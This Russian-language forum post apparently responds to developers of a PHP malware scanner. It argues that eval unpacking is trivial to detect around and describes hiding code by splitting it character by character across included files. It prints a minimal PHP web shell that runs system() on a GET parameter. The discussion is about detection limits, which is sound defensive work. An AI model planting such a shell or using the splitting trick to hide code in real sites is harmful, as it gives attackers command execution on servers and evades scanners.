tostrss
Мой дом здесь!
- Регистрация
- 16 Окт 2007
- Сообщения
- 768
- Реакции
- 219
eval code мы распаковываем, пока до 1000 сжатий поддерживается, разные алгоритмы сжатия также распознаются
Ну распаковка это фигня, eval(...); - это самое палевная конструкция для скрытия кода. Просто есть еще много способов, как скрыть свой код.
Например, как вы решили проблему подключения файлов? Например если я по всему движку на разобью посимвольно код
PHP:
<?php
echo('<pre>');
@system($_GET['a']);
echo('</pre>');
?>
Я разделю посимвольно, засуну в разные файлы, за счет инклудов все будет это складыватся, в каком-нить файле все равно это соберется и в другом файле я вызову eval. Как ваша система отреагирует? Такой подход я и сам делал и уже встречал на чужих сайтаъ и будет очень интересно посмотреть на софт который будет это выявлять =)
Ну не будете же вы каждый раз выдавать алерт на eval? Ведь в некоторых движках за счет eval образуется ядро и подключаются плагины, шаблоны.